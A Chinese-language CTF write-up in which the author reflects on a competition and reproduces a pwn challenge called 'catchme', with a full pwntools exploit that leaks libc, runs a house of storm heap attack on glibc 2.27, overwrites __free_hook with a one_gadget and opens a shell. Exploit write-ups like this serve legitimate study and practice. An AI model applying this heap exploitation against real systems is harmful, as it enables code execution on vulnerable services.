前言

没招了，我真被check恶心到了，要不是队内渗透大手子墨尘师傅，我真要寄了，下半场看那个渗透的pwn，我也是没招了，谁家好人windows里面运行elf文件啊，直接白给命令执行我也没招啊。还有那个靶机一，不知道脏牛提权为什么提不上去，哭死，不过还好墨尘师傅梭出来了.......

评分3.0，我是躺赢狗，墨尘师傅评分12.0，他得了mvp！！！

我这里就只放pwn的复现记录了，完整的wp就不放出来（其实是看看会长怎么说），有点丢人说是......

正文

catchme

比赛的时候心态有点崩，试了攻击一些结构体发现这个版本的libc存在硬编码的检查就没再打下去了，应该试一试house of storm的，思路很简单，就是打libc2.23-libc2.29之间都能打的house of storm去申请堆块到__free_hook，将其覆盖为one_gadget就好。

exp：

from pwn import *
from pwn_std import *
from SomeofHouse import HouseOfSome

ip="localhost"
port=8080

context(os='linux', arch='amd64', log_level='debug')
elf=ELF("./catchme")
libc=ELF("/home/alpha/glibc-all-in-one/libs/2.27-3ubuntu1.6_amd64/libc.so.6")


cmd = """

dir /home/alpha/CTF/glibc-source/glibc-2.27/elf
dir /home/alpha/CTF/glibc-source/glibc-2.27/malloc

b *$rebase(0x0000000000000B8E)
b _int_malloc
b free
"""

def clear(index):
    sla(">>",str(6))
    sla('index',str(index))

def edit(index,content):
    sla(">>",str(4))
    sla('index:',str(index))
    sa('tag:',content)

def add(co):
    sla(">>",str(1))
    sla('(3)otter',str(co))

def dele(index):
    sla(">>",str(2))
    sla('index',str(index))

def show(index):
    sla(">>",str(3))
    sla('index',str(index))



# edit(3,p64(lb+libc.sym["system"]))
while True:
    p=getProcess(ip,port,'./catchme')
    add(1)
    add(1)
    dele(0)
    show(0)
    ru(b'tag:')
    lb=uu64(rc(6))-(0x71af7cfebca0-0x71af7cc00000)
    print(hex(lb))

    dele(1)

    clear(0)
    clear(1)

    # add(1)#0
    # add(1)#1
    # dele(0)
    # dele(1)
    # clear(0)


    # add(2)#0
    # add(1)#2
    # add(1)#3
    # ##准备unsortbin attack
    # dele(2)
    # print('_mp=',hex(lb+0x3eb2d0))
    # edit(2,p64(lb+0x3eb2d0-0x10))
    # add(1)#4
    # edit(2,p64(lb+libc.sym["__free_hook"]))
    #在做这个攻击之前，我需要将这个tcache的bin给填满
    for i in range(7):
        add(3)
        dele(0)
        clear(0)

    add(2)#0
    add(3)#1
    add(1)#2
    add(3)#3

    dele(2)
    dele(0)
    clear(0)
    add(2)#0
    dele(0)

    fake_chunk = lb + libc.sym["__free_hook"] - 0x10-0x8
    print("__free_hook=",hex(lb+libc.sym["__free_hook"]))
    edit(0,p64(fake_chunk))

    pl=p64(fake_chunk+8)+p64(0)+p64(fake_chunk-0x18-5)
    edit(2,pl)

    add(3)#4
    rc(1)
    msg=p.recv(timeout=0.5)
    print('msg=',msg)
    if b'malloc' in msg:
        print("no !!!")
        p.close()
        continue
    else:
        print("success !!!")
        break

'''
0x4f29e execve("/bin/sh", rsp+0x40, environ)
constraints:
  address rsp+0x50 is writable
  rsp & 0xf == 0
  rcx == NULL || {rcx, "-c", r12, NULL} is a valid argv

0x4f2a5 execve("/bin/sh", rsp+0x40, environ)
constraints:
  address rsp+0x50 is writable
  rsp & 0xf == 0
  rcx == NULL || {rcx, rax, r12, NULL} is a valid argv

0x4f302 execve("/bin/sh", rsp+0x40, environ)
constraints:
  [rsp+0x40] == NULL || {[rsp+0x40], [rsp+0x48], [rsp+0x50], [rsp+0x58], ...} is a valid argv

0x10a2fc execve("/bin/sh", rsp+0x70, environ)
constraints:
  [rsp+0x70] == NULL || {[rsp+0x70], [rsp+0x78], [rsp+0x80], [rsp+0x88], ...} is a valid argv
'''    
def edit(index,content):
    sl(str(4))
    sla('index:',str(index))
    sa('tag:',content)
edit(4,p64(lb+0x4f302))
# gdbbug(cmd)
dele(4)
ita()